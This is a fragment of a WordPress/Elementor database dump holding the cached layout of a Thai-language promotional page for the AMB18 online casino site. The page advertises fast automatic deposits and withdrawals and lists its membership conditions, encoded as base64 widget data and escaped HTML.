data=\\\"eyJpZCI6ImU5MjExNTkiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8dWw+PGxpIGRhdGEtc3RhcnQ9XCIyNTMxXCIgZGF0YS1lbmQ9XCIyNTcwXCI+XHUwZTQwXHUwZTAyXHUwZTQ5XHUwZTMyXHUwZTJhXHUwZTM5XHUwZTQ4XHUwZTIzXHUwZTMwXHUwZTFhXHUwZTFhIFx1MjE5MiBcdTBlNDRcdTBlMWJcdTBlMTdcdTBlMzVcdTBlNDhcdTBlNDBcdTBlMjFcdTBlMTlcdTBlMzkgPHN0cm9uZyBkYXRhLXN0YXJ0PVwiMjU1NVwiIGRhdGEtZW5kPVwiMjU2OFwiPlx1MGU0Mlx1MGUxYlx1MGUyM1x1MGU0Mlx1MGUyMVx1MGUwYVx1MGUzMVx1MGU0OFx1MGUxOTxcL3N0cm9uZz48XC9saT48bGkgZGF0YS1zdGFydD1cIjI1NzRcIiBkYXRhLWVuZD1cIjI2NDNcIj5cdTBlNDBcdTBlMjVcdTBlMzdcdTBlMmRcdTBlMDFcdTBlNDJcdTBlMWJcdTBlMjNcdTBlMTdcdTBlMzVcdTBlNDhcdTBlMTVcdTBlNDlcdTBlMmRcdTBlMDdcdTBlMDFcdTBlMzJcdTBlMjMgXHUwZTQxXHUwZTI1XHUwZTMwXHUwZTAxXHUwZTE0IDxzdHJvbmcgZGF0YS1zdGFydD1cIjI1OTlcIiBkYXRhLWVuZD1cIjI2MTRcIj5cdTBlMDFcdTBlMTRcdTBlMjNcdTBlMzFcdTBlMWFcdTBlMmFcdTBlMzRcdTBlMTdcdTBlMThcdTBlMzRcdTBlNGM8XC9zdHJvbmc+IChcdTBlMmJcdTBlMjNcdTBlMzdcdTBlMmRcdTBlNDFcdTBlMDhcdTBlNDlcdTBlMDdcdTBlNDFcdTBlMmRcdTBlMTRcdTBlMjFcdTBlMzRcdTBlMTlcdTBlMTVcdTBlMzJcdTBlMjFcdTBlMTdcdTBlMzVcdTBlNDhcdTBlMjNcdTBlMzBcdTBlMWFcdTBlMzgpPFwvbGk+PGxpIGRhdGEtc3RhcnQ9XCIyNjQ3XCIgZGF0YS1lbmQ9XCIyNzA2XCI+XHUwZTIzXHUwZTMwXHUwZTFhXHUwZTFhXHUwZTQwXHUwZTA0XHUwZTIzXHUwZTE0XHUwZTM0XHUwZTE1XHUwZTQwXHUwZTAyXHUwZTQ5XHUwZTMyIDxzdHJvbmcgZGF0YS1zdGFydD1cIjI2NjJcIiBkYXRhLWVuZD1cIjI2NzVcIj5cdTBlMmRcdTBlMzFcdTBlMTVcdTBlNDJcdTBlMTlcdTBlMjFcdTBlMzFcdTBlMTVcdTBlMzQ8XC9zdHJvbmc+IFwvIFx1MGUyYlx1MGUyM1x1MGUzN1x1MGUyZFx1MGUyYlx1MGUyNVx1MGUzMVx1MGUwN1x1MGUyMlx1MGUzN1x1MGUxOVx1MGUyMlx1MGUzMVx1MGUxOVx1MGUyYVx1MGUzNFx1MGUxN1x1MGUxOFx1MGUzNFx1MGU0Y1x1MGUyYVx1MGUzM1x1MGU0MFx1MGUyM1x1MGU0N1x1MGUwODxcL2xpPjxsaSBkYXRhLXN0YXJ0PVwiMjcxMFwiIGRhdGEtZW5kPVwiMjc0MVwiPlx1MGUxNVx1MGUyM1x1MGUyN1x1MGUwOFx1MGUyYVx1MGUyZFx1MGUxYVx1MGUyYVx1MGUxNlx1MGUzMlx1MGUxOVx1MGUzMFx1MGU0NFx1MGUxNFx1MGU0OVx1MGU0M1x1MGUxOVx1MGUxYlx1MGUyM1x1MGUzMFx1MGUyN1x1MGUzMVx1MGUxNVx1MGUzNFx1MGUxOFx1MGUzOFx1MGUyM1x1MGUwMVx1MGUyM1x1MGUyM1x1MGUyMTxcL2xpPjxcL3VsPiJ9LCJlbGVtZW50cyI6W10sIndpZGdldFR5cGUiOiJ0ZXh0LWVkaXRvciJ9\\\"]\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/section>\\n\\t\\t\\t\\t<section class=\\\"elementor-section elementor-top-section elementor-element elementor-element-3257b34 elementor-section-boxed elementor-section-height-default elementor-section-height-default\\\" data-id=\\\"3257b34\\\" data-element_type=\\\"section\\\" data-e-type=\\\"section\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-container elementor-column-gap-default\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-076795c\\\" data-id=\\\"076795c\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-87a05f6 elementor-widget elementor-widget-heading\\\" data-id=\\\"87a05f6\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h2 class=\\\"elementor-heading-title elementor-size-default\\\">\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/h2>\\t\\t\\t\\t<\\/div>\\n\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6Ijk3ODE0MjIiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8dWw+PGxpIGRhdGEtc3RhcnQ9XCIyMDkyXCIgZGF0YS1lbmQ9XCIyMTc2XCI+XHUwZTQyXHUwZTFiXHUwZTIzXHUwZTE3XHUwZTMxXHUwZTQ5XHUwZTA3XHUwZTJiXHUwZTIxXHUwZTE0XHUwZTJhXHUwZTMzXHUwZTJiXHUwZTIzXHUwZTMxXHUwZTFhIDxzdHJvbmcgZGF0YS1zdGFydD1cIjIxMDlcIiBkYXRhLWVuZD1cIjIxMzhcIj4xIFx1MGUxY1x1MGUzOVx1MGU0OVx1MGU0M1x1MGUwYVx1MGU0OVwvMSBcdTBlMmRcdTBlMzhcdTBlMWJcdTBlMDFcdTBlMjNcdTBlMTNcdTBlNGNcLzEgXHUwZTQ0XHUwZTJkXHUwZTFlXHUwZTM1PFwvc3Ryb25nPiBcdTBlMmJcdTBlNDlcdTBlMzJcdTBlMjFcdTBlNDNcdTBlMGFcdTBlNDlcdTBlMmJcdTBlMjVcdTBlMzJcdTBlMjJcdTBlMWFcdTBlMzFcdTBlMGRcdTBlMGFcdTBlMzVcdTBlMmJcdTBlMjNcdTBlMzdcdTBlMmRcdTBlMTdcdTBlMzhcdTBlMDhcdTBlMjNcdTBlMzRcdTBlMTVcdTBlMTdcdTBlMzhcdTBlMDFcdTBlMjNcdTBlMzlcdTBlMWJcdTBlNDFcdTBlMWFcdTBlMWE8XC9saT48bGkgZGF0YS1zdGFydD1cIjIxNzlcIiBkYXRhLWVuZD1cIjIzMDFcIj5cdTBlMDFcdTBlMzJcdTBlMjNcdTBlMTlcdTBlMzFcdTBlMWFcdTBlNDBcdTBlMTdcdTBlMzRcdTBlMjNcdTBlNGNcdTBlMTlcdTBlNDFcdTBlMjVcdTBlMzBcdTBlMDFcdTBlMzJcdTBlMjNcdTBlMTZcdTBlMmRcdTBlMTkgPHN0cm9uZyBkYXRhLXN0YXJ0PVwiMjIwMVwiIGRhdGEtZW5kPVwiMjIzN1wiPlx1MGU0MFx1MGUxYlx1MGU0N1x1MGUxOVx1MGU0NFx1MGUxYlx1MGUxNVx1MGUzMlx1MGUyMVx1MGUyM1x1MGUzMFx1MGUxYVx1MGUxYVx1MGUyZFx1MGUzMVx1MGUxNVx1MGU0Mlx1MGUxOVx1MGUyMVx1MGUzMVx1MGUxNVx1MGUzNFx1MGUwMlx1MGUyZFx1MGUwN1x1MDBhMDxcL3N0cm9uZz48Yj5BTUIxOFx1MDBhMDxcL2I+XHUwZTQwXHUwZTA5XHUwZTFlXHUwZTMyXHUwZTMwXHUwZTJiXHUwZTIxXHUwZTI3XHUwZTE0XHUwZTJhXHUwZTI1XHUwZTQ3XHUwZTJkXHUwZTE1IChcdTBlMmJcdTBlMzJcdTBlMDFcdTBlMjFcdTBlMzVcdTBlMmJcdTBlMjFcdTBlMjdcdTBlMTRcdTBlMTdcdTBlMzVcdTBlNDhcdTBlNDRcdTBlMjFcdTBlNDhcdTBlMTlcdTBlMzFcdTBlMWFcdTBlNDBcdTBlMTdcdTBlMzRcdTBlMjNcdTBlNGNcdTBlMTkgXHUwZTIzXHUwZTMwXHUwZTFhXHUwZTFhXHUwZTA4XHUwZTMwXHUwZTQxXHUwZTA4XHUwZTQ5XHUwZTA3XHUwZTQzXHUwZTE5XHUwZTJiXHUwZTE5XHUwZTQ5XHUwZTMyXHUwZTQwXHUwZTAxXHUwZTIxKTxcL2xpPjxsaSBkYXRhLXN0YXJ0PVwiMjMwNFwiIGRhdGEtZW5kPVwiMjQwNFwiPlx1MGU0MFx1MGUyMVx1MGUzN1x1MGU0OFx1MGUyZFx1MGUwMVx1MGUxNFx1MGUyM1x1MGUzMVx1MGUxYVx1MGU0Mlx1MGUxYlx1MGUyM1x1MGU0M1x1MGUxNFx1MGU0Mlx1MGUxYlx1MGUyM1x1MGUyYlx1MGUxOVx1MGUzNlx1MGU0OFx1MGUwNyBcdTBlMTZcdTBlMzdcdTBlMmRcdTBlMjdcdTBlNDhcdTBlMzJcdTBlMjJcdTBlMmRcdTBlMjFcdTBlMjNcdTBlMzFcdTBlMWFcdTBlNDBcdTBlMDdcdTBlMzdcdTBlNDhcdTBlMmRcdTBlMTlcdTBlNDRcdTBlMDJcdTBlMDJcdTBlMmRcdTBlMDdcdTBlNDJcdTBlMWJcdTBlMjNcdTBlMTlcdTBlMzFcdTBlNDlcdTBlMTkgXHUwZTQ2IFx1MGU0MVx1MGUyNVx1MGUzMCA8c3Ryb25nIGRhdGEtc3RhcnQ9XCIyMzY1XCIgZGF0YS1lbmQ9XCIyMzg1XCI+XHUwZTQ0XHUwZTIxXHUwZTQ4XHUwZTJhXHUwZTMyXHUwZTIxXHUwZTMyXHUwZTIzXHUwZTE2XHUwZTBiXHUwZTQ5XHUwZTJkXHUwZTE5XHUwZTQyXHUwZTFiXHUwZTIzPFwvc3Ryb25nPiBcdTBlMjJcdTBlMDFcdTBlNDBcdTBlMjdcdTBlNDlcdTBlMTlcdTBlMTdcdTBlMzVcdTBlNDhcdTBlMjNcdTBlMzBcdTBlMWFcdTBlMzhcdTBlNDRcdTBlMjdcdTBlNDk8XC9saT48bGkgZGF0YS1zdGFydD1cIjI0MDdcIiBkYXRhLWVuZD1cIjI0OTlcIj48c3BhbiBkYXRhLXN0YXJ0PVwiMjQxNFwiIGRhdGEtZW5kPVwiMjQ0NVwiPjxiPkFNQjE4IFx1MGUwMlx1MGUyZFx1MGUyYVx1MGUwN1x1MGUyN1x1MGUxOVx1MGUyYVx1MGUzNFx1MGUxN1x1MGUxOFx1MGUzNFx1MGU0Y1x1MGUxYlx1MGUyM1x1MGUzMVx1MGUxYVx1MGUxYlx1MGUyM1x1MGUzOFx1MGUwN1wvXHUwZTIyXHUwZTAxXHUwZTQwXHUwZTI1XHUwZTM0XHUwZTAxPFwvYj48XC9zcGFuPlx1MDBhMFx1MGU0Mlx1MGUxYlx1MGUyM1x1MGU0Mlx1MGUyMVx1MGUwYVx1MGUzMVx1MGU0OFx1MGUxOSBcdTBlNDFcdTBlMjVcdTBlMzBcdTBlMWJcdTBlMGZcdTBlMzRcdTBlNDBcdTBlMmFcdTBlMThcdTBlMDFcdTBlMzJcdTBlMjNcdTBlMDhcdTBlNDhcdTBlMzJcdTBlMjJcdTBlMmJcdTBlMzJcdTBlMDFcdTBlMTVcdTBlMjNcdTBlMjdcdTBlMDhcdTBlMWVcdTBlMWFcdTBlMTdcdTBlMzhcdTBlMDhcdTBlMjNcdTBlMzRcdTBlMTVcL1x1MGUxY1x1MGUzNFx1MGUxNFx1MGU0MFx1MGUwN1x1MGUzN1x1MGU0OFx1MGUyZFx1MGUxOVx1MGU0NFx1MGUwMjxcL2xpPjxcL3VsPiJ9LCJlbGVtZW50cyI6W10sIndpZGdldFR5cGUiOiJ0ZXh0LWVkaXRvciJ9\\\"]\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/section>\\n\\t\\t\",\"scripts\":[],\"styles\":[]}}'),(3588,29,'_elementor_page_assets','a:2:{s:6:\"styles\";a:2:{i:0;s:14:\"widget-heading\";i:1;s:12:\"widget-image\";}s:7:\"scripts\";a:1:{i:0;s:18:\"elementor-frontend\";}}'),(3589,29,'_elementor_css','a:6:{s:4:\"time\";i:1788460950;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3590,29,'_elementor_element_cache','{\"timeout\":1788638855,\"value\":{\"content\":\"\\t\\t<section class=\\\"elementor-section elementor-top-section elementor-element elementor-element-3ffd0d3 elementor-section-boxed elementor-section-height-default elementor-section-height-default\\\" data-id=\\\"3ffd0d3\\\" data-element_type=\\\"section\\\" data-e-type=\\\"section\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-container elementor-column-gap-default\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-e0d3c94\\\" data-id=\\\"e0d3c94\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-70ef781 elementor-widget elementor-widget-heading\\\" data-id=\\\"70ef781\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h1 class=\\\"elementor-heading-title elementor-size-default\\\">AMB18 \\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e47\\u0e27\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 5 \\u0e27\\u0e34\\u0e40\\u0e07\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32<\\/h1>\\t\\t\\t\\t<\\/div>\\n\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6IjBjYjNmYjAiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cCBkYXRhLXBtLXNsaWNlPVwiMCAwIFtdXCI+XHUwZTQwXHUwZTI3XHUwZTQ3XHUwZTFhXHUwZTFlXHUwZTE5XHUwZTMxXHUwZTE5IEFNQjE4IFx1MGUwOFx1MGUzMVx1MGUxNFx1MGU0MFx1MGUxNVx1MGU0N1x1MGUyMVx1MGUxNFx1MGU0OVx1MGUyN1x1MGUyMlx1MGUyM1x1MGUzMFx1MGUxYVx1MGUxYVx1MGUxZFx1MGUzMlx1MGUwMVx1MGUxNlx1MGUyZFx1MGUxOVx1MGUyZFx1MGUyZFx1MGU0Mlx1MGUxNVx1MGU0OVx1MGUyYVx1MGUzOFx1MGUxNFx1MGUyNVx1MGU0OVx1MGUzM1x1MGUxNFx1MGUzNVx1MGU0NFx1MGUwYlx1MGUxOVx1MGU0Y1x1MGUyMVx1MGUzMlx1MGU0MFx1MGUxZVx1MGUzN1x1MGU0OFx1MGUyZFx1MGUyYVx1MGUzMlx1MGUyMlx1MGU0MFx1MGUyNVx1MGU0OFx1MGUxOVx1MGUxN1x1MGUzNVx1MGU0OFx1MGUxNVx1MGU0OVx1MGUyZFx1MGUwN1x1MGUwMVx1MGUzMlx1MGUyM1x1MGUwNFx1MGUyN1x1MGUzMlx1MGUyMVx1MGU0NFx1MGUyN1x1MGU0MVx1MGUxYVx1MGUxYVx1MGU0NFx1MGUyMVx1MGU0OFx1MGUyYVx1MGUzMFx1MGUxNFx1MGUzOFx1MGUxNCBcdTBlMTdcdTBlMzhcdTBlMDFcdTBlMDJcdTBlMzFcdTBlNDlcdTBlMTlcdTBlMTVcdTBlMmRcdTBlMTlcdTBlMTdcdTBlMzNcdTBlMDdcdTBlMzJcdTBlMTlcdTBlMmRcdTBlMzFcdTBlMTVcdTBlNDJcdTBlMTlcdTBlMjFcdTBlMzFcdTBlMTVcdTBlMzQgMjQgXHUwZTBhXHUwZTMxXHUwZTQ4XHUwZTI3XHUwZTQyXHUwZTIxXHUwZTA3XHUwZTQwXHUwZTE1XHUwZTQ3XHUwZTIxIFx1MGU0NFx1MGUyMVx1MGU0OFx1MGUxNVx1MGU0OVx1MGUyZFx1MGUwN1x1MGUxN1x1MGUzMVx1MGUwMVx1MGU0MVx1MGUyZFx1MGUxNFx1MGUyMVx1MGUzNFx1MGUxOVx1MGU0NFx1MGUyMVx1MGU0OFx1MGUxNVx1MGU0OVx1MGUyZFx1MGUwN1x1MGUyM1x1MGUyZFx1MGU0M1x1MGUyYlx1MGU0OVx1MGU0MFx1MGUyYVx1MGUzNVx1MGUyMlx1MGUwOFx1MGUzMVx1MGUwN1x1MGUyYlx1MGUyN1x1MGUzMFx1MGUxN1x1MGUzM1x1MGUyM1x1MGUzMlx1MGUyMlx1MGUwMVx1MGUzMlx1MGUyM1x1MGU0MVx1MGUwNFx1MGU0OFx1MGU0NFx1MGUyMVx1MGU0OFx1MGUwMVx1MGUzNVx1MGU0OFx1MGUwNFx1MGUyNVx1MGUzNFx1MGUwMVx1MGUwMVx1MGU0N1x1MGU0MFx1MGUyM1x1MGUzNVx1MGUyMlx1MGUxYVx1MGUyM1x1MGU0OVx1MGUyZFx1MGUyMiBcdTBlMDhcdTBlMzhcdTBlMTRcdTBlMDJcdTBlMzJcdTBlMjJcdTBlMTdcdTBlMzVcdTBlNDhcdTBlMmJcdTBlMjVcdTBlMzJcdTBlMjJcdTBlMDRcdTBlMTlcdTBlNDBcdTBlMjVcdTBlMzRcdTBlMWZcdTBlMDRcdTBlMzdcdTBlMmRcdTBlNDRcdTBlMjFcdTBlNDhcdTBlMjFcdTBlMzVcdTBlMDJcdTBlMzFcdTBlNDlcdTBlMTlcdTBlMTVcdTBlNDhcdTBlMzNcdTBlNDNcdTBlMTlcdTBlMDFcdTBlMzJcdTBlMjNcdTBlMWRcdTBlMzJcdTBlMDFcdTBlMTZcdTBlMmRcdTBlMTlcdTBlMDhcdTBlMzBcdTBlNDBcdTBlMTVcdTBlMzRcdTBlMjFcdTBlMTlcdTBlNDlcdTBlMmRcdTBlMjJcdTBlNDBcdTBlMTVcdTBlMzRcdTBlMjFcdTBlMmJcdTBlMTlcdTBlMzFcdTBlMDFcdTBlMDFcdTBlNDdcdTBlMDhcdTBlMzFcdTBlMTRcdTBlMDFcdTBlMzJcdTBlMjNcdTBlMDdcdTBlMWFcdTBlNDRcdTBlMTRcdTBlNDlcdTBlMTVcdTBlMzJcdTBlMjFcdTBlMmFcdTBlNDRcdTBlMTVcdTBlMjVcdTBlNGNcdTBlMTVcdTBlMzFcdTBlMjdcdTBlNDBcdTBlMmRcdTBlMDcgXHUwZTE1XHUwZTJkXHUwZTFhXHUwZTQyXHUwZTA4XHUwZTE3XHUwZTIyXHUwZTRjXHUwZTE3XHUwZTMxXHUwZTQ5XHUwZTA3XHUwZTIxXHUwZTM3XHUwZTJkXHUwZTQzXHUwZTJiXHUwZTIxXHUwZTQ4XHUwZTE3XHUwZTM1XHUwZTQ4XHUwZTQwXHUwZTFlXHUwZTM0XHUwZTQ4XHUwZTA3XHUwZTI1XHUwZTJkXHUwZTA3XHUwZTJhXHUwZTE5XHUwZTMyXHUwZTIxIFx1MGU0MVx1MGUyNVx1MGUzMFx1MGUyYVx1MGUzMlx1MGUyMlx1MGU0Mlx1MGUxYlx1MGUyM1x1MGUxN1x1MGUzNVx1MGU0OFx1MGU0MFx1MGUyNVx1MGU0OFx1MGUxOVx1MGUxYlx1MGUyM1x1MGUzMFx1MGUwOFx1MGUzM1x1MGU0MVx1MGUwNFx1MGU0OFx1MGU0NFx1MGUyMVx1MGU0OFx1MGUwMVx1MGUzNVx1MGU0OFx1MGUyN1x1MGUzNFx1MGUxOVx1MGUzMlx1MGUxN1x1MGUzNVx1MGU0MFx1MGUwN1x1MGUzNFx1MGUxOVx1MGUwMVx1MGU0N1x1MGUyN1x1MGUzNFx1MGU0OFx1MGUwN1x1MGU0MFx1MGUwMlx1MGU0OVx1MGUzMlx1MGUxYVx1MGUzMVx1MGUwZFx1MGUwYVx1MGUzNVx1MGU0MVx1MGUxYVx1MGUxYVx1MGUxN1x1MGUzMVx1MGUxOVx1MGU0M1x1MGUwOCBcdTBlMjNcdTBlMzBcdTBlMWFcdTBlMWFcdTBlNDBcdTBlMmFcdTBlMTZcdTBlMzVcdTBlMjJcdTBlMjMgXHUwZTI1XHUwZTM3XHUwZTQ4XHUwZTE5XHUwZTQ0XHUwZTJiXHUwZTI1IFx1MGU0MVx1MGUyNVx1MGUzMFx1MGUyMVx1MGUzNVx1MGUwNFx1MGUyN1x1MGUzMlx1MGUyMVx1MGUxYlx1MGUyNVx1MGUyZFx1MGUxNFx1MGUyMFx1MGUzMVx1MGUyMlx1MGUyYVx1MGUzOVx1MGUwNyBcdTBlMjNcdTBlMmRcdTBlMDdcdTBlMjNcdTBlMzFcdTBlMWFcdTBlMmJcdTBlMjVcdTBlMzJcdTBlMjJcdTBlMThcdTBlMTlcdTBlMzJcdTBlMDRcdTBlMzJcdTBlMjNcdTBlMGFcdTBlMzFcdTBlNDlcdTBlMTlcdTBlMTlcdTBlMzNcdTBlNDNcdTBlMTlcdTBlNDRcdTBlMTdcdTBlMjIgXHUwZTQzXHUwZTBhXHUwZTQ5XHUwZTA3XHUwZTMyXHUwZTE5XHUwZTA3XHUwZTQ4XHUwZTMyXHUwZTIyXHUwZTQ0XHUwZTIxXHUwZTQ4XHUwZTBiXHUwZTMxXHUwZTFhXHUwZTBiXHUwZTQ5XHUwZTJkXHUwZTE5IFx1MGU0MFx1MGUyYlx1MGUyMVx1MGUzMlx1MGUzMFx1MGUwMVx1MGUzMVx1MGUxYVx1MGUwNFx1MGUxOVx1MGUxN1x1MGUzNVx1MGU0OFx1MGUyZFx1MGUyMlx1MGUzMlx1MGUwMVx1MGU0NFx1MGUxNFx1MGU0OVx1MGUxN1x1MGUzMVx1MGU0OVx1MGUwN1x1MGUwNFx1MGUyN1x1MGUzMlx1MGUyMVx1MGU0MFx1MGUyM1x1MGU0N1x1MGUyNyBcdTBlMDRcdTBlMjdcdTBlMzJcdTBlMjFcdTBlMDRcdTBlMzhcdTBlNDlcdTBlMjEgXHUwZTQxXHUwZTI1XHUwZTMwXHUwZTA0XHUwZTI3XHUwZTMyXHUwZTIxXHUwZTJhXHUwZTMwXHUwZTE0XHUwZTI3XHUwZTAxXHUwZTQzXHUwZTE5XHUwZTE3XHUwZTM1XHUwZTQ4XHUwZTQwXHUwZTE0XHUwZTM1XHUwZTIyXHUwZTI3IFx1MGUyZFx1MGUyMlx1MGU0OFx1MGUzMlx1MGUwN1x1MGU0NFx1MGUyM1x1MGUwMVx1MGU0N1x1MGUxNVx1MGUzMlx1MGUyMSBcdTBlMDRcdTBlMjdcdTBlMjNcdTBlNDNcdTBlMGFcdTBlNDlcdTBlMDdcdTBlMzJcdTBlMTlcdTBlMmRcdTBlMjJcdTBlNDhcdTBlMzJcdTBlMDdcdTBlMjFcdTBlMzVcdTBlMmFcdTBlMTVcdTBlMzQgXHUwZTI3XHUwZTMyXHUwZTA3XHUwZTQxXHUwZTFjXHUwZTE5XHUwZTAxXHUwZTMyXHUwZTIzXHUwZTQwXHUwZTI1XHUwZTQ4XHUwZTE5XHUwZTQzXHUwZTJiXHUwZTQ5XHUwZTE0XHUwZTM1IFx1MGU0MVx1MGUyNVx1MGUzMFx1MGU0MFx1MGUxYlx1MGUzNFx1MGUxNFx1MGU0M1x1MGUyYlx1MGU0OVx1MGUxYVx1MGUyM1x1MGUzNFx1MGUwMVx1MGUzMlx1MGUyM1x1MGU0MFx1MGUwOVx1MGUxZVx1MGUzMlx1MGUzMFx1MGUxY1x1MGUzOVx1MGU0OVx1MGUxN1x1MGUzNVx1MGU0OFx1MGUyMVx1MGUzNVx1MGUyZFx1MGUzMlx1MGUyMlx1MGUzOCAxOCBcdTBlMWJcdTBlMzVcdTBlMDJcdTBlMzZcdTBlNDlcdTBlMTlcdTBlNDRcdTBlMWIgXHUwZTQwXHUwZTFlXHUwZTM3XHUwZTQ4XHUwZTJkXHUwZTAxXHUwZTMyXHUwZTIzXHUwZTQzXHUwZTBhXHUwZTQ5XHUwZTA3XHUwZTMyXHUwZTE5XHUwZTJkXHUwZTIyXHUwZTQ4XHUwZTMyXHUwZTA3XHUwZTIzXHUwZTMxXHUwZTFhXHUwZTFjXHUwZTM0XHUwZTE0XHUwZTBhXHUwZTJkXHUwZTFhPFwvcD4ifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ==\\\"]\\t\\t<div class=\\\"elementor-element elementor-element-11898c9 elementor-widget elementor-widget-image\\\" data-id=\\\"11898c9\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"1200\\\" height=\\\"500\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/3icon-AMB18.webp\\\" class=\\\"attachment-full size-full wp-image-345\\\" alt=\\\"\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/3icon-AMB18.webp 1200w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/3icon-AMB18-300x125.webp 300w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/3icon-AMB18-1024x427.webp 1024w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/3icon-AMB18-768x320.webp 768w\\\" sizes=\\\"(max-width: 1200px) 100vw, 1200px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-1741422 elementor-widget elementor-widget-heading\\\" data-id=\\\"1741422\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h2 class=\\\"elementor-heading-title elementor-size-default\\\">\\u0e17\\u0e33\\u0e44\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c AMB18 \\u0e16\\u0e36\\u0e07\\u0e40\\u0e23\\u0e47\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19<\\/h2>\\t\\t\\t\\t<\\/div>\\n\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6ImQ5YjNhNjgiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cCBkYXRhLXN0YXJ0PVwiMjI4OVwiIGRhdGEtZW5kPVwiMjUzMVwiPlx1MGUyYVx1MGUzNFx1MGU0OFx1MGUwN1x1MGUxN1x1MGUzNVx1MGU0OFx1MGUxN1x1MGUzM1x1MGU0M1x1MGUyYlx1MGU0OSA8Yj5BTUIxOFx1MDBhMDxcL2I+XHUwZTQyXHUwZTE0XHUwZTE0XHUwZTQwXHUwZTE0XHUwZTQ4XHUwZTE5XHUwZTQwXHUwZTJiXHUwZTE5XHUwZTM3XHUwZTJkXHUwZTQwXHUwZTI3XHUwZTQ3XHUwZTFhXHUwZTJkXHUwZTM3XHUwZTQ4XHUwZTE5IFx1MGUwNFx1MGUzN1x1MGUyZFx1MGUwMVx1MGUzMlx1MGUyM1x1MGU0M1x1MGUwYVx1MGU0OVx1MGU0MFx1MGUxN1x1MGUwNFx1MGU0Mlx1MGUxOVx1MGU0Mlx1MGUyNVx1MGUyMlx1MGUzNSA8c3Ryb25nIGRhdGEtc3RhcnQ9XCIyMzUzXCIgZGF0YS1lbmQ9XCIyMzgwXCI+QXV0byBUcmFuc2FjdGlvbiBTeXN0ZW08XC9zdHJvbmc+IFx1MGUxN1x1MGUzNVx1MGU0OFx1MGU0MFx1MGUwYVx1MGUzN1x1MGU0OFx1MGUyZFx1MGUyMVx1MGUxNVx1MGU0OFx1MGUyZFx1MGU0Mlx1MGUxNF